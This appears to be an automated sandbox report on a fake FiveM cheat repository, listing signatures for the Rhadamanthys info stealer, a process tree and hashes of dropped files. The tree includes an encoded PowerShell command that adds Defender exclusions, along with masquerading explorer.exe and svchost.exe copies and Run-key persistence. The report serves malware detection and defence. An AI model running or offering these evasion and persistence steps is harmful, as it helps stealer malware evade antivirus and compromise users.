Analysis

  • max time kernel
    52s
  • max time network
    55s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-03-2024 17:14

General

  • Target

    https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file

Malware Config

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 14 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Detects Pyinstaller 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2556
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3656
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe71de9758,0x7ffe71de9768,0x7ffe71de9778
        2⤵
          PID:4056
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:2
          2⤵
            PID:3608
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
            2⤵
              PID:1892
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
              2⤵
                PID:2572
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
                2⤵
                  PID:4988
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
                  2⤵
                    PID:4488
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
                    2⤵
                      PID:3760
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
                      2⤵
                        PID:1648
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
                        2⤵
                        • NTFS ADS
                        PID:2228
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=748 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
                        2⤵
                          PID:1256
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=744 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
                          2⤵
                            PID:1752
                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                          1⤵
                            PID:472
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:4836
                            • C:\Program Files\7-Zip\7zFM.exe
                              "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_SKRIPTGG-FIVEM-main.zip\SKRIPTGG-FIVEM-main\Skript.rar"
                              1⤵
                              • NTFS ADS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:1048
                              • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3136
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:692
                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1076
                                  • C:\Users\Admin\AppData\Local\Temp\explorer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:4872
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
                                      5⤵
                                        PID:3372
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /f /im "explorer.exe"
                                          6⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3848
                                        • C:\Users\Admin\explorer.exe
                                          "explorer.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4928
                                          • C:\Users\Admin\explorer.exe
                                            "explorer.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Adds Run key to start application
                                            PID:4472
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "ver"
                                              8⤵
                                                PID:3036
                                    • C:\Users\Admin\AppData\Local\svchost.exe
                                      "C:\Users\Admin\AppData\Local\svchost.exe"
                                      3⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3468

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\54a9cb04-5113-456e-9a1d-b55effe3d08e.tmp

                                  Filesize

                                  6KB

                                  MD5

                                  9f1a6445367cc4d103ea23ba6a25d29e

                                  SHA1

                                  acb7b4221643e8ab3adc4be490cfb17985ac6e0b

                                  SHA256

                                  d789cbe774d21c88d503b142c845a1428f9869e0aa051f76f52feab4d02f0e9a

                                  SHA512

                                  7229ea66a082b776a7adde6748131bef0854f8b0c61cddbb1655bee3cb2a3e83fba2b4c002609a3c34c80cb8a21d3f00c1b025fca97096e5568ddb4c145e0f13

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                  Filesize

                                  1KB

                                  MD5

                                  b2f5c306c67fdbb6fa1f89107b31956c

                                  SHA1

                                  19b0a4b076842ec0992e9ac69ceb7b906cca9987

                                  SHA256

                                  d6652e8ff910dd6ed47306796d48b675f323b71fd317b1f7f23657510de075b4

                                  SHA512

                                  5e58e0f647056485ea419ee18363a0ea0d76aaaa6ef87b6aadf519c09aec80a17cda3487b082f2e2a4bc79de840d67ae8f978b57dedef2191561430554e212dd

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                  Filesize

                                  1KB

                                  MD5

                                  7522e7a039345eb7b386b855a08ef962

                                  SHA1

                                  3f545710518e677018462d60951c0355dcc10550

                                  SHA256

                                  ccc46d5ddb5da4e7f92bd4507bdc36ec0845273c50a4d96d161970301c929442

                                  SHA512

                                  259ba46342963c4f76309213264d5d85549a03c9029749c73c1a55dfc38aef22115dce1c5e4c8d90b7cdac53abbfb5bf881fd57d7f77ebb67f594f826eb9ef75

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                  Filesize

                                  1KB

                                  MD5

                                  a6184a0a3dec1c7d2d138d19db7db363

                                  SHA1

                                  21be18aaf810db19e74fe9ae4c9182f50feaafdc

                                  SHA256

                                  ac2d1370a61c0c54f9996fc98fadf7ebc87a5abbb0f1e8f1ea68d652f08bca10

                                  SHA512

                                  f28afffb7f9731b40e1df7461e130a70226ce86b3eb1c74d2e13b6295d0b1e8f620b88e299d1ba9db0de654783c425a7681977e2439fb3b2696a32587c77cdc9

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  c8ddd319b049fe44ccb8f4fa8fdcfbad

                                  SHA1

                                  1f8e742313155c6fb083cf64a995086909806eb8

                                  SHA256

                                  2b4d5abbdeb883bb460c522698406f7b25b6d072a2f92782a1525c088d9a7454

                                  SHA512

                                  f7acc0167ad42764a43630727e3b82c52c6c2943ca5ff5395ded55dccc24cf5a8f94667efa8e067ee873b6b555944e769e406720275ebccffea558054680fd9e

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                  Filesize

                                  131KB

                                  MD5

                                  abc87457e2bf86c1297021067e7281fc

                                  SHA1

                                  805388a2fa900ac28b937ace125a4d4f8afa53f5

                                  SHA256

                                  598aef6bbe39ea21f988cc192317059c15b01c24ed5b24ebf454d2203d9de646

                                  SHA512

                                  d55740f7437f3be13e265ae07c3665f552577f14b6f93549574634e0d622591ffcae10d9eab52ddb0a3a6b045886b8e6c865d34f972a0b8e6c088309655d87ba

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                  Filesize

                                  132KB

                                  MD5

                                  b28cd8c7e1baeb92f287f7196c914e23

                                  SHA1

                                  d927d1cdb6e794a910be1bc89d1ca3b0560a5bec

                                  SHA256

                                  72305b3328e72ec38dcd18b8889476aaf062b3bebe17f2a61b3edfffb0bc48cb

                                  SHA512

                                  b7b4a26703887ea56ba5cdbd8f2e362494eb14d6156e5e2cfeec3c0cfa54f465ecc2b99f71597a1c17e6819623d26323f58d2f004f90076ee0cd2c31c7e9d850

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                  Filesize

                                  2B

                                  MD5

                                  99914b932bd37a50b983c5e7c90ae93b

                                  SHA1

                                  bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                  SHA256

                                  44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                  SHA512

                                  27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe

                                  Filesize

                                  569KB

                                  MD5

                                  465669a572d077471d1b1a3a2ea11f78

                                  SHA1

                                  49ec69d4c986c778cbef3ffa9c72116eda8be10a

                                  SHA256

                                  c5999468752a61442001b68405c29f509e82a7167d354e427bcc870f7b368324

                                  SHA512

                                  56619cb7c58bd5996ce5a0a952adfffb520653c4de328b478adb04c61d767ace9bf1ce7b5936cc3131680ca59f3b7ae850be5d883856835bad99fe4ca1a3115a

                                • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  2bb02618abeccb4271f39f581afc6003

                                  SHA1

                                  fd51a6177b75a183f83faa07b85b26eafa56a354

                                  SHA256

                                  f2c2b91972e1dc86e82f64506ddc242474e372a1fdd7ecac56679bb413a3d95d

                                  SHA512

                                  46ec6395a84c5de201f0a80930686bea641e74188522b200a40b38eca5dce14dda4c21d6e65199dc95aea1714a237e4c9fbb7c72db2214280019a074111aaffa

                                • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe

                                  Filesize

                                  448KB

                                  MD5

                                  cf14aa6e5982a60e6ef39db5964221b2

                                  SHA1

                                  e29a62c89f9084279a854f3208ce234b88e85ae0

                                  SHA256

                                  b0b9526fedf665f68c8a74f20ae2e5b2098f6176684f4fc41d75c4ae2663e75b

                                  SHA512

                                  9cc0f5fdb6dd02fe97b7bcac65d46bf30c32518c8612991108e9e9893158ace87437b05d4e520550be7c55f5a7de7e9b6c1fc8357422daeeefbd7efc39c14770

                                • C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe:Zone.Identifier

                                  Filesize

                                  88B

                                  MD5

                                  3c41410c4fd694c8ba99ecec4c6eff11

                                  SHA1

                                  2b676e157e187af40d7d127ef810283e290cf96c

                                  SHA256

                                  9a854108a2e693f3dd049bbe3c7bae7a4894eed071c285783cbe3962550395dc

                                  SHA512

                                  365a9840e3e514a5a5998590dd73b418d3609a88db56a25bb04fed632040cc3f73e6aa9f96b9e98a7d1508b1b6a9c72147b143f1d2cac2bcf1ce3371bec815f3

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\VCRUNTIME140.dll

                                  Filesize

                                  95KB

                                  MD5

                                  f34eb034aa4a9735218686590cba2e8b

                                  SHA1

                                  2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                  SHA256

                                  9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                  SHA512

                                  d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_bz2.pyd

                                  Filesize

                                  47KB

                                  MD5

                                  f6e387f20808828796e876682a328e98

                                  SHA1

                                  6679ae43b0634ac706218996bac961bef4138a02

                                  SHA256

                                  8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b

                                  SHA512

                                  ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_ctypes.pyd

                                  Filesize

                                  58KB

                                  MD5

                                  48ce90022e97f72114a95630ba43b8fb

                                  SHA1

                                  f2eba0434ec204d8c6ca4f01af33ef34f09b52fd

                                  SHA256

                                  5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635

                                  SHA512

                                  7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_decimal.pyd

                                  Filesize

                                  105KB

                                  MD5

                                  2030438e4f397a7d4241a701a3ca2419

                                  SHA1

                                  28b8d06135cd1f784ccabda39432cc83ba22daf7

                                  SHA256

                                  07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72

                                  SHA512

                                  767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_hashlib.pyd

                                  Filesize

                                  35KB

                                  MD5

                                  13f99120a244ab62af1684fbbc5d5a7e

                                  SHA1

                                  5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724

                                  SHA256

                                  11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b

                                  SHA512

                                  46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_lzma.pyd

                                  Filesize

                                  85KB

                                  MD5

                                  7c66f33a67fbb4d99041f085ef3c6428

                                  SHA1

                                  e1384891df177b45b889459c503985b113e754a3

                                  SHA256

                                  32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866

                                  SHA512

                                  d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\_socket.pyd

                                  Filesize

                                  42KB

                                  MD5

                                  0dd957099cf15d172d0a343886fb7c66

                                  SHA1

                                  950f7f15c6accffac699c5db6ce475365821b92a

                                  SHA256

                                  8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a

                                  SHA512

                                  3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\base_library.zip

                                  Filesize

                                  859KB

                                  MD5

                                  483d9675ef53a13327e7dfc7d09f23fe

                                  SHA1

                                  2378f1db6292cd8dc4ad95763a42ad49aeb11337

                                  SHA256

                                  70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e

                                  SHA512

                                  f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\libcrypto-1_1.dll

                                  Filesize

                                  1.1MB

                                  MD5

                                  e5aecaf59c67d6dd7c7979dfb49ed3b0

                                  SHA1

                                  b0a292065e1b3875f015277b90d183b875451450

                                  SHA256

                                  9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                  SHA512

                                  145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\libffi-7.dll

                                  Filesize

                                  23KB

                                  MD5

                                  6f818913fafe8e4df7fedc46131f201f

                                  SHA1

                                  bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                  SHA256

                                  3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                  SHA512

                                  5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\python310.dll

                                  Filesize

                                  384KB

                                  MD5

                                  12be9e904b6e7695fab14cadd8312c42

                                  SHA1

                                  36a7aed1a00a6001a30909ad66c769dac2f410a0

                                  SHA256

                                  30b1a69e4849812296ace5d43620a59ed348be86f75bf23d5a5ee96b08b531cf

                                  SHA512

                                  c48914063e109da3735dbe1eacba4386f4e5ddaaddd654d8eb6354168f5f7bb01a975f6ca199bbda8517a204ea5aad53000331ff64164c0ea37084307247a4ba

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\select.pyd

                                  Filesize

                                  25KB

                                  MD5

                                  5c66bcf3cc3c364ecac7cf40ad28d8f0

                                  SHA1

                                  faf0848c231bf120dc9f749f726c807874d9d612

                                  SHA256

                                  26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc

                                  SHA512

                                  034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

                                • C:\Users\Admin\AppData\Local\Temp\_MEI10762\unicodedata.pyd

                                  Filesize

                                  289KB

                                  MD5

                                  dfa1f0cd0ad295b31cb9dda2803bbd8c

                                  SHA1

                                  cc68460feae2ff4e9d85a72be58c8011cb318bc2

                                  SHA256

                                  46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10

                                  SHA512

                                  7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

                                • C:\Users\Admin\AppData\Local\Temp\_MEI49282\python310.dll

                                  Filesize

                                  1.4MB

                                  MD5

                                  3f782cf7874b03c1d20ed90d370f4329

                                  SHA1

                                  08a2b4a21092321de1dcad1bb2afb660b0fa7749

                                  SHA256

                                  2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6

                                  SHA512

                                  950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvsi12g1.pdb.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  2.2MB

                                  MD5

                                  28d79a17cd998d636f3092537ef55055

                                  SHA1

                                  7cbabad3034268f723103981eee6bfdd19b87386

                                  SHA256

                                  36ecac8ab3ebccbe532cb112dbb71658c66a1dc491cb14e54419ad9082fac2e2

                                  SHA512

                                  07b4f297dd4333bb5014462c23c4020f3c68f66fc78b8316c53b63ca4add13dc737334c94cbe5d22970ec283e45fa2e501593634fbb0830f28fa2a4051af1689

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  1.2MB

                                  MD5

                                  79a10cb36cbec1e8cd50ffa90e5f8197

                                  SHA1

                                  dd830d2cc28e2940e80f25143032a0e4985fbd80

                                  SHA256

                                  372a4508297b9546c967b67cb2abd4005dc73aeb54258f6a075f49eded5cd7b7

                                  SHA512

                                  5c596d65baa2d5a610d4a2ce372a23795762928debfb90a579fa21d8398578e3d46a345b0a49969d8864375a437d0b46e467bbfb15e7fe9b01173435e75bf08c

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  c507a34241e66fe6506b155f5d722d46

                                  SHA1

                                  f4f8488f95342f9355cae76951e7e9f77a5b1ac1

                                  SHA256

                                  ff9a68735435585525e7ac0885c717b202a6b9efd8902f04c3754e6a717bfafa

                                  SHA512

                                  7f5adf399e4dc3e4112a475ba2824e6dde82aa476b800e05bfc0ef7d2339863ceac9d579e1e1bcbf2d822427a8af15ef041ce1794b43b4fecb3764c6d27c9d6d

                                • C:\Users\Admin\AppData\Local\Temp\explorer.exe

                                  Filesize

                                  384KB

                                  MD5

                                  4de4d85fe66551584dd024cdfedd99a3

                                  SHA1

                                  16e5d998d2481573aa8cd9b56dfaf778dd6f1391

                                  SHA256

                                  81b033e5ba8d54c91cbe9c74307d6e76711ea8f8142e8fad5d540507d64fdd6d

                                  SHA512

                                  138381294ee0e94502126973b5f2098fd53edf0b7dd16d31fabc2bdb225e7594d78ed9912e17a5adcf81b2c3b96a669bc62bb46c0be0cc62dfdaf7bbc7a7eba6

                                • C:\Users\Admin\AppData\Local\svchost.exe

                                  Filesize

                                  355KB

                                  MD5

                                  8a6f1580a5b9b94d7cd47cc6b1af1b9a

                                  SHA1

                                  e68768afd59e18091d345cb300e859572e8d4c5c

                                  SHA256

                                  bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe

                                  SHA512

                                  1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309

                                • C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip

                                  Filesize

                                  5.2MB

                                  MD5

                                  5e65bdca353aeabd62fa725b97e4bcf9

                                  SHA1

                                  045b32c4f5c08e0de0df3a9b519ef5cfa71f5194

                                  SHA256

                                  38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2

                                  SHA512

                                  93544f6643222df73bdbb5c8bb08c07f9c595c9c83e8d96066fb73b86d165f1f742bd79e656d5fcc80b4258fd8d566cbb3a44c23fa4e4bb5f5d49a3459dba075

                                • C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip:Zone.Identifier

                                  Filesize

                                  26B

                                  MD5

                                  fbccf14d504b7b2dbcb5a5bda75bd93b

                                  SHA1

                                  d59fc84cdd5217c6cf74785703655f78da6b582b

                                  SHA256

                                  eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                  SHA512

                                  aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                • C:\Users\Admin\activate.bat

                                  Filesize

                                  91B

                                  MD5

                                  fbcbd43fa00e29f002495e4ab2dc4782

                                  SHA1

                                  75aad7a3fa21226bf37ff89da953743d2b650dc0

                                  SHA256

                                  7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648

                                  SHA512

